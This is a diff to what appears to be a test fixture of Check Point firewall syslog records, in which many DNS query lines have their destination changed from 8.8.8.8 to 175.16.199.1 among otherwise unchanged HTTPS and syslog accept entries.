-<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60716"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49360"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53810"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49853"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60716"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.16"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53262"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55657"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42674"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55657"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29e,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504926"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42674"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.108.173.172"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"34504"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41608"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55507"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60803"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33994"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59772"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41608"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55507"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60803"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33994"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59772"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38746"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52714"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e29f,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42919"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42994"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59749"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42919"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42994"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:02:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e29f,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585504927"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59749"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
